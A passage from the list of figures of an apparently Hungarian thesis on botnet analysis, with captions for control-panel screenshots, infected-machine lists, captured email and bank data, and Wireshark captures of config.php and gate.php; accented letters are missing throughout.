...................................................... 70 63. bra Vezrl panelben informcik a gpekrl ............................................................. 71 64. bra Megfertztt gpek opercis rendszerei .............................................................. 72 96

65. bra Bot informci a 109-es gprl ............................................................................. 72 66. bra Megfertztt gpek listja ..................................................................................... 73 67. bra Citromail adatok .................................................................................................... 74 68. bra Freemail adatok ..................................................................................................... 74 69. bra Gmail adatok.......................................................................................................... 75 70. bra OTP online bankozs ............................................................................................. 76 71. bra OTP banki adatok .................................................................................................. 77 72. bra K&H banki adatok ................................................................................................. 78 73. bra Erste banki adatok.................................................................................................. 79 74. bra Wireshark config.php ............................................................................................ 82 75. bra Config.php sszealtsa a wiresharkban ................................................................ 83 76. bra Wireshark gate.php ................................................................................................ 83 77. bra Gate.php sszealtsa a wiresharkban.................................................................... 84 78. bra Windows Feladatkezel idpontjban ................................................................... 86 79. bra TCPview fertzs idpontjban............................................................................. 87 80. bra Tasklist lekrdezse a megfertztt gpen ............................................................ 87

97

16.

Tblzat jegyzk

1 Tblzat Botnet tpusok tulajdonsgai .............................................................................. 29

98